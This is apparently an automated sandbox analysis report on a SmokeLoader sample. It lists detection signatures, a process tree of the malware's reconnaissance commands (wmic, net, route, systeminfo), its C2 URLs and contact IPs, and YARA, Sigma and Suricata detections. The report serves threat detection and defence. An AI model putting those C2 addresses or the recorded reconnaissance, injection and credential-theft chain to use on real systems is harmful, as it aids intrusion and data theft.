Edit tour

Windows Analysis Report
v173TV3V11.exe

Overview

General Information

Sample name:	v173TV3V11.exe renamed because original name is a hash value
Original sample name:	c108169f00ff9c5ad6fa70df9137e44a.exe
Analysis ID:	1524644
MD5:	c108169f00ff9c5ad6fa70df9137e44a
SHA1:	1acfe826a57cdd04016324bcadaa6c7cd273b1f7
SHA256:	5c86632a8ef4e46497b06979b965000700a51a2e1fdcf2bed91ff9c5b963a179
Tags:	exeStealcuser-abuse_ch
Infos:

Detection

SmokeLoader

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for dropped file

Benign windows process drops PE files

Detected unpacking (changes PE section rights)

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for dropped file

Suricata IDS alerts for network traffic

System process connects to network (likely due to code injection or exploit)

Yara detected SmokeLoader

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))

Checks if the current machine is a virtual machine (disk enumeration)

Creates a thread in another existing process (thread injection)

Deletes itself after installation

Found evasive API chain (may stop execution after checking mutex)

Hides that the sample has been downloaded from the Internet (zone.identifier)

Injects code into the Windows Explorer (explorer.exe)

Machine Learning detection for dropped file

Machine Learning detection for sample

Maps a DLL or memory area into another process

Modifies the windows firewall

Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Queries sensitive service information (via WMI, Win32_StartupCommand, often done to detect sandboxes)

Switches to a custom stack to bypass stack traces

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Uses ipconfig to lookup or modify the Windows network settings

Uses netsh to modify the Windows network and firewall settings

Writes to foreign memory regions

AV process strings found (often used to terminate AV products)

Abnormal high CPU Usage

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Checks if the current process is being debugged

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)

Contains functionality to dynamically determine API calls

Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Contains functionality to retrieve information about pressed keystrokes

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Drops files with a non-matching file extension (content does not match file extension)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

PE file contains sections with non-standard names

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the current domain controller via net

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sigma detected: Execution of Suspicious File Type Extension

Sigma detected: Suspicious Group And Account Reconnaissance Activity Using Net.EXE

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses the system / local time for branch decision (may execute only at specific dates)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Yara signature match

Classification

Process Tree

System is w10x64

v173TV3V11.exe (PID: 2196 cmdline: "C:\Users\user\Desktop\v173TV3V11.exe" MD5: C108169F00FF9C5AD6FA70DF9137E44A)

explorer.exe (PID: 2580 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)

C35.exe (PID: 1856 cmdline: C:\Users\user\AppData\Local\Temp\C35.exe MD5: 31B228301D6FB368186C2D025311D1AF)

451E.exe (PID: 6696 cmdline: C:\Users\user\AppData\Local\Temp\451E.exe MD5: 69C7186C5393D5E94294E39DA1D4D830)

cmd.exe (PID: 2692 cmdline: cmd MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 5868 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WMIC.exe (PID: 3352 cmdline: wmic /namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /format:csv MD5: C37F2F4F4B3CD128BDABCAEB2266A785)

WMIC.exe (PID: 888 cmdline: wmic /namespace:\\root\SecurityCenter2 Path FirewallProduct Get displayName /format:csv MD5: C37F2F4F4B3CD128BDABCAEB2266A785)

WMIC.exe (PID: 5812 cmdline: wmic /namespace:\\root\SecurityCenter2 Path AntiSpywareProduct Get displayName /format:csv MD5: C37F2F4F4B3CD128BDABCAEB2266A785)

WMIC.exe (PID: 2164 cmdline: wmic /namespace:\\root\cimv2 Path Win32_Processor Get Name,DeviceID,NumberOfCores /format:csv MD5: C37F2F4F4B3CD128BDABCAEB2266A785)

WMIC.exe (PID: 5448 cmdline: wmic /namespace:\\root\cimv2 Path Win32_Product Get Name,Version /format:csv MD5: C37F2F4F4B3CD128BDABCAEB2266A785)

WMIC.exe (PID: 4092 cmdline: wmic /namespace:\\root\cimv2 Path Win32_NetworkAdapter Where PhysicalAdapter=TRUE Get Name,MACAddress,ProductName,ServiceName,NetConnectionID /format:csv MD5: C37F2F4F4B3CD128BDABCAEB2266A785)

WMIC.exe (PID: 5408 cmdline: wmic /namespace:\\root\cimv2 Path Win32_StartupCommand Get Name,Location,Command /format:csv MD5: C37F2F4F4B3CD128BDABCAEB2266A785)

WMIC.exe (PID: 1420 cmdline: wmic /namespace:\\root\cimv2 Path Win32_OperatingSystem Get Caption,CSDVersion,BuildNumber,Version,BuildType,CountryCode,CurrentTimeZone,InstallDate,LastBootUpTime,Locale,OSArchitecture,OSLanguage,OSProductSuite,OSType,SystemDirectory,Organization,RegisteredUser,SerialNumber /format:csv MD5: C37F2F4F4B3CD128BDABCAEB2266A785)

WMIC.exe (PID: 1860 cmdline: wmic /namespace:\\root\cimv2 Path Win32_Process Get Caption,CommandLine,ExecutablePath,ProcessId /format:csv MD5: C37F2F4F4B3CD128BDABCAEB2266A785)

WMIC.exe (PID: 2708 cmdline: wmic /namespace:\\root\cimv2 Path Win32_Volume Get Name,Label,FileSystem,SerialNumber,BootVolume,Capacity,DriveType /format:csv MD5: C37F2F4F4B3CD128BDABCAEB2266A785)

WMIC.exe (PID: 2908 cmdline: wmic /namespace:\\root\cimv2 Path Win32_UserAccount Get Name,Domain,AccountType,LocalAccount,Disabled,Status,SID /format:csv MD5: C37F2F4F4B3CD128BDABCAEB2266A785)

WMIC.exe (PID: 3328 cmdline: wmic /namespace:\\root\cimv2 Path Win32_GroupUser Get GroupComponent,PartComponent /format:csv MD5: C37F2F4F4B3CD128BDABCAEB2266A785)

WMIC.exe (PID: 5480 cmdline: wmic /namespace:\\root\cimv2 Path Win32_ComputerSystem Get Caption,Manufacturer,PrimaryOwnerName,UserName,Workgroup /format:csv MD5: C37F2F4F4B3CD128BDABCAEB2266A785)

WMIC.exe (PID: 3616 cmdline: wmic /namespace:\\root\cimv2 Path Win32_PnPEntity Where ClassGuid="{50dd5230-ba8a-11d1-bf5d-0000f805f530}" Get Name,DeviceID,PNPDeviceID,Manufacturer,Description /format:csv MD5: C37F2F4F4B3CD128BDABCAEB2266A785)

ipconfig.exe (PID: 6240 cmdline: ipconfig /displaydns MD5: 62F170FB07FDBB79CEB7147101406EB8)

ROUTE.EXE (PID: 6264 cmdline: route print MD5: 3C97E63423E527BA8381E81CBA00B8CD)

netsh.exe (PID: 6304 cmdline: netsh firewall show state MD5: 6F1E6DD688818BC3D1391D0CC7D597EB)

systeminfo.exe (PID: 6344 cmdline: systeminfo MD5: EE309A9C61511E907D87B10EF226FDCD)

tasklist.exe (PID: 6020 cmdline: tasklist /v /fo csv MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)

net.exe (PID: 7120 cmdline: net accounts /domain MD5: 0BD94A338EEA5A4E1F2830AE326E6D19)

net1.exe (PID: 3552 cmdline: C:\Windows\system32\net1 accounts /domain MD5: 55693DF2BB3CBE2899DFDDF18B4EB8C9)

net.exe (PID: 2740 cmdline: net share MD5: 0BD94A338EEA5A4E1F2830AE326E6D19)

net1.exe (PID: 7148 cmdline: C:\Windows\system32\net1 share MD5: 55693DF2BB3CBE2899DFDDF18B4EB8C9)

net.exe (PID: 6504 cmdline: net user MD5: 0BD94A338EEA5A4E1F2830AE326E6D19)

explorer.exe (PID: 6916 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: DD6597597673F72E10C9DE7901FBA0A8)

explorer.exe (PID: 4900 cmdline: C:\Windows\explorer.exe MD5: 662F4F92FDE3557E86D110526BB578D5)

explorer.exe (PID: 2176 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: DD6597597673F72E10C9DE7901FBA0A8)

explorer.exe (PID: 5368 cmdline: C:\Windows\explorer.exe MD5: 662F4F92FDE3557E86D110526BB578D5)

explorer.exe (PID: 3588 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: DD6597597673F72E10C9DE7901FBA0A8)

explorer.exe (PID: 5268 cmdline: C:\Windows\explorer.exe MD5: 662F4F92FDE3557E86D110526BB578D5)

bsjhhuh (PID: 5868 cmdline: C:\Users\user\AppData\Roaming\bsjhhuh MD5: C108169F00FF9C5AD6FA70DF9137E44A)

vejhhuh (PID: 4500 cmdline: C:\Users\user\AppData\Roaming\vejhhuh MD5: 31B228301D6FB368186C2D025311D1AF)

msiexec.exe (PID: 6940 cmdline: C:\Windows\system32\msiexec.exe /V MD5: E5DA170027542E25EDE42FC54C929077)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
SmokeLoader	The SmokeLoader family is a generic backdoor with a range of capabilities which depend on the modules included in any given build of the malware. The malware is delivered in a variety of ways and is broadly associated with criminal activity. The malware frequently tries to hide its C2 activity by generating requests to legitimate sites such as microsoft.com, bing.com, adobe.com, and others. Typically the actual Download returns an HTTP 404 but still contains data in the Response Body.	SMOKY SPIDER	http://security.neurolabs.club/2019/08/smokeloaders-hardcoded-domains-sneaky.html http://security.neurolabs.club/2019/10/dynamic-imports-and-working-around.html http://security.neurolabs.club/2020/04/diffing-malware-samples-using-bindiff.html http://security.neurolabs.club/2020/06/unpacking-smokeloader-and.html https://0xc0decafe.com/2020/12/23/detect-rc4-in-malicious-binaries	https://malpedia.caad.fkie.fraunhofer.de/details/win.smokeloader

Malware Configuration

Threatname: SmokeLoader

{"Version": 2022, "C2 list": ["http://nwgrus.ru/tmp/index.php", "http://tech-servers.in.net/tmp/index.php", "http://unicea.ws/tmp/index.php"]}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000011.00000002.4175265628.0000000000F61000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_SmokeLoader	Yara detected SmokeLoader	Joe Security
00000005.00000002.2024427682.0000000002091000.00000004.10000000.00040000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000005.00000002.2024427682.0000000002091000.00000004.10000000.00040000.00000000.sdmp	Windows_Trojan_Smokeloader_4e31426e	unknown	unknown	0x214:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
00000005.00000002.2024380318.0000000002070000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000005.00000002.2024380318.0000000002070000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_4e31426e	unknown	unknown	0x614:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
00000008.00000002.2561500633.0000000000670000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_3687686f	unknown	unknown	0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
00000006.00000002.2315796782.00000000008AE000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x36b9:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000000.00000002.1780503587.00000000006B0000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_3687686f	unknown	unknown	0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
00000005.00000002.2024314586.00000000006ED000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x3b90:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000000.00000002.1780720142.000000000090E000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x37a8:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000006.00000003.2264399369.00000000006C0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000006.00000002.2315604310.00000000006E1000.00000004.10000000.00040000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000006.00000002.2315604310.00000000006E1000.00000004.10000000.00040000.00000000.sdmp	Windows_Trojan_Smokeloader_4e31426e	unknown	unknown	0x1e4:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
00000000.00000002.1780526952.00000000006C0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000000.00000002.1780526952.00000000006C0000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_4e31426e	unknown	unknown	0x614:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
00000000.00000002.1780608383.0000000000801000.00000004.10000000.00040000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000000.00000002.1780608383.0000000000801000.00000004.10000000.00040000.00000000.sdmp	Windows_Trojan_Smokeloader_4e31426e	unknown	unknown	0x214:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
00000005.00000002.2024197978.00000000006C0000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_3687686f	unknown	unknown	0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
00000008.00000002.2561731311.00000000006D0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000008.00000002.2561731311.00000000006D0000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_4e31426e	unknown	unknown	0x5e4:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
00000008.00000002.2561826979.00000000006F1000.00000004.10000000.00040000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000008.00000002.2561826979.00000000006F1000.00000004.10000000.00040000.00000000.sdmp	Windows_Trojan_Smokeloader_4e31426e	unknown	unknown	0x1e4:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
00000008.00000003.2510328595.00000000006D0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000008.00000002.2562004757.000000000075D000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x3811:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000010.00000002.4175451887.00000000034A1000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_SmokeLoader	Yara detected SmokeLoader	Joe Security
00000006.00000002.2315529494.00000000006B0000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_3687686f	unknown	unknown	0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
00000006.00000002.2315554860.00000000006C0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000006.00000002.2315554860.00000000006C0000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_4e31426e	unknown	unknown	0x5e4:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
Process Memory Space: explorer.exe PID: 2176	JoeSecurity_SmokeLoader	Yara detected SmokeLoader	Joe Security
Process Memory Space: explorer.exe PID: 5368	JoeSecurity_SmokeLoader	Yara detected SmokeLoader	Joe Security
Click to see the 25 entries

Unpacked PEs

Source	Rule	Description	Author
6.2.C35.exe.6b0e67.1.raw.unpack	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
6.3.C35.exe.6c0000.0.raw.unpack	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
6.2.C35.exe.400000.0.unpack	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
8.2.vejhhuh.670e67.1.raw.unpack	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
8.2.vejhhuh.400000.0.unpack	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
8.3.vejhhuh.6d0000.0.raw.unpack	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
Click to see the 1 entries

Sigma Signatures

System Summary

Sigma detected: Execution of Suspicious File Type Extension

Source: Process started

Author: Max Altgelt (Nextron Systems): Data: Command: C:\Users\user\AppData\Roaming\bsjhhuh, CommandLine: C:\Users\user\AppData\Roaming\bsjhhuh, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\bsjhhuh, NewProcessName: C:\Users\user\AppData\Roaming\bsjhhuh, OriginalFileName: C:\Users\user\AppData\Roaming\bsjhhuh, ParentCommandLine: , ParentImage: , ParentProcessId: 1044, ProcessCommandLine: C:\Users\user\AppData\Roaming\bsjhhuh, ProcessId: 5868, ProcessName: bsjhhuh

Sigma detected: Suspicious Group And Account Reconnaissance Activity Using Net.EXE

Source: Process started

Author: Florian Roth (Nextron Systems), omkar72, @svch0st, Nasreddine Bencherchali (Nextron Systems): Data: Command: net accounts /domain, CommandLine: net accounts /domain, CommandLine|base64offset|contains: , Image: C:\Windows\System32\net.exe, NewProcessName: C:\Windows\System32\net.exe, OriginalFileName: C:\Windows\System32\net.exe, ParentCommandLine: cmd, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 2692, ParentProcessName: cmd.exe, ProcessCommandLine: net accounts /domain, ProcessId: 7120, ProcessName: net.exe

Sigma detected: Local Accounts Discovery

Source: Process started

Author: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community: Data: Command: wmic /namespace:\\root\cimv2 Path Win32_UserAccount Get Name,Domain,AccountType,LocalAccount,Disabled,Status,SID /format:csv , CommandLine: wmic /namespace:\\root\cimv2 Path Win32_UserAccount Get Name,Domain,AccountType,LocalAccount,Disabled,Status,SID /format:csv , CommandLine|base64offset|contains: h, Image: C:\Windows\System32\wbem\WMIC.exe, NewProcessName: C:\Windows\System32\wbem\WMIC.exe, OriginalFileName: C:\Windows\System32\wbem\WMIC.exe, ParentCommandLine: cmd, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 2692, ParentProcessName: cmd.exe, ProcessCommandLine: wmic /namespace:\\root\cimv2 Path Win32_UserAccount Get Name,Domain,AccountType,LocalAccount,Disabled,Status,SID /format:csv , ProcessId: 2908, ProcessName: WMIC.exe

Sigma detected: Net.exe Execution

Source: Process started

Author: Michael Haag, Mark Woan (improvements), James Pemberton / @4A616D6573 / oscd.community (improvements): Data: Command: net accounts /domain, CommandLine: net accounts /domain, CommandLine|base64offset|contains: , Image: C:\Windows\System32\net.exe, NewProcessName: C:\Windows\System32\net.exe, OriginalFileName: C:\Windows\System32\net.exe, ParentCommandLine: cmd, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 2692, ParentProcessName: cmd.exe, ProcessCommandLine: net accounts /domain, ProcessId: 7120, ProcessName: net.exe

Sigma detected: Suspicious Network Command

Source: Process started

Author: frack113, Christopher Peacock '@securepeacock', SCYTHE '@scythe_io': Data: Command: route print, CommandLine: route print, CommandLine|base64offset|contains: , Image: C:\Windows\System32\ROUTE.EXE, NewProcessName: C:\Windows\System32\ROUTE.EXE, OriginalFileName: C:\Windows\System32\ROUTE.EXE, ParentCommandLine: cmd, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 2692, ParentProcessName: cmd.exe, ProcessCommandLine: route print, ProcessId: 6264, ProcessName: ROUTE.EXE

Suricata Signatures

ET MALWARE Suspected Smokeloader Activity (POST)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-03T02:52:23.786088+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49736	190.219.117.240	80	TCP
2024-10-03T02:52:24.904716+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49737	190.219.117.240	80	TCP
2024-10-03T02:52:26.182658+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49738	190.219.117.240	80	TCP
2024-10-03T02:52:27.283559+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49739	190.219.117.240	80	TCP
2024-10-03T02:52:28.391966+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49740	190.219.117.240	80	TCP
2024-10-03T02:52:30.168698+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49741	190.219.117.240	80	TCP
2024-10-03T02:52:31.286466+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49742	190.219.117.240	80	TCP
2024-10-03T02:52:32.378001+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49743	190.219.117.240	80	TCP
2024-10-03T02:52:33.467881+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49744	190.219.117.240	80	TCP
2024-10-03T02:52:34.595323+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49745	190.219.117.240	80	TCP
2024-10-03T02:52:35.763792+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49746	190.219.117.240	80	TCP
2024-10-03T02:52:36.903395+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49747	190.219.117.240	80	TCP
2024-10-03T02:52:38.030099+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49748	190.219.117.240	80	TCP
2024-10-03T02:52:39.129458+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49749	190.219.117.240	80	TCP
2024-10-03T02:52:41.272613+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49750	190.219.117.240	80	TCP
2024-10-03T02:52:42.384476+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49751	190.219.117.240	80	TCP
2024-10-03T02:52:43.560652+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49752	190.219.117.240	80	TCP
2024-10-03T02:52:44.667910+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49753	190.219.117.240	80	TCP
2024-10-03T02:52:45.777403+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49754	190.219.117.240	80	TCP
2024-10-03T02:52:46.914017+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49755	190.219.117.240	80	TCP
2024-10-03T02:52:48.014248+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49756	190.219.117.240	80	TCP
2024-10-03T02:52:49.132178+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49757	190.219.117.240	80	TCP
2024-10-03T02:52:50.225515+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49758	190.219.117.240	80	TCP
2024-10-03T02:52:51.419382+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49759	190.219.117.240	80	TCP
2024-10-03T02:52:52.746812+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49760	190.219.117.240	80	TCP
2024-10-03T02:52:55.089069+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49763	190.219.117.240	80	TCP
2024-10-03T02:52:56.197435+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49764	190.219.117.240	80	TCP
2024-10-03T02:52:57.297018+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49765	190.219.117.240	80	TCP
2024-10-03T02:52:58.428777+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49766	190.219.117.240	80	TCP
2024-10-03T02:52:59.545775+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49767	190.219.117.240	80	TCP
2024-10-03T02:53:17.311199+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49768	23.145.40.162	443	TCP
2024-10-03T02:53:18.822466+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49769	23.145.40.162	443	TCP
2024-10-03T02:53:19.796874+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49770	23.145.40.162	443	TCP
2024-10-03T02:53:20.702172+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49771	23.145.40.162	443	TCP
2024-10-03T02:53:21.627296+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49772	23.145.40.162	443	TCP
2024-10-03T02:53:22.504515+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49773	23.145.40.162	443	TCP
2024-10-03T02:53:23.621205+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49774	23.145.40.162	443	TCP
2024-10-03T02:53:24.505897+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49775	23.145.40.162	443	TCP
2024-10-03T02:53:25.432551+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49776	23.145.40.162	443	TCP
2024-10-03T02:53:26.279216+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49777	23.145.40.162	443	TCP
2024-10-03T02:53:27.149314+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49778	23.145.40.162	443	TCP
2024-10-03T02:53:28.117408+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49779	23.145.40.162	443	TCP
2024-10-03T02:53:29.105071+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49780	23.145.40.162	443	TCP
2024-10-03T02:53:29.986819+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49781	23.145.40.162	443	TCP
2024-10-03T02:53:31.633961+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49782	23.145.40.162	443	TCP
2024-10-03T02:53:32.525840+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49783	23.145.40.162	443	TCP
2024-10-03T02:53:33.464530+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49784	23.145.40.162	443	TCP
2024-10-03T02:53:37.932180+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49785	23.145.40.162	443	TCP
2024-10-03T02:54:09.019446+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49786	190.219.117.240	80	TCP
2024-10-03T02:54:15.778409+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49787	190.219.117.240	80	TCP
2024-10-03T02:54:24.178713+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49788	190.219.117.240	80	TCP
2024-10-03T02:54:31.831285+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49789	190.219.117.240	80	TCP
2024-10-03T02:54:41.494607+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49790	190.219.117.240	80	TCP
2024-10-03T02:54:53.531734+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49791	23.145.40.162	443	TCP
2024-10-03T02:54:56.654275+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49792	201.212.52.197	80	TCP
2024-10-03T02:55:09.647073+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49793	23.145.40.162	443	TCP
2024-10-03T02:55:14.179610+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49794	201.212.52.197	80	TCP
2024-10-03T02:55:27.283552+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49795	23.145.40.162	443	TCP
2024-10-03T02:55:31.392173+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49796	201.212.52.197	80	TCP
2024-10-03T02:55:44.012872+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49797	23.145.40.162	443	TCP
2024-10-03T02:55:49.226473+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49798	201.212.52.197	80	TCP
2024-10-03T02:56:00.601332+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49799	23.145.40.162	443	TCP

ET MALWARE Windows route Microsoft Windows DOS prompt command exit OUTBOUND

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-03T02:56:07.147321+0200	2019082	1	A Network Trojan was detected	192.168.2.4	49800	23.145.40.113	443	TCP
2024-10-03T02:56:07.152005+0200	2019082	1	A Network Trojan was detected	192.168.2.4	49800	23.145.40.113	443	TCP

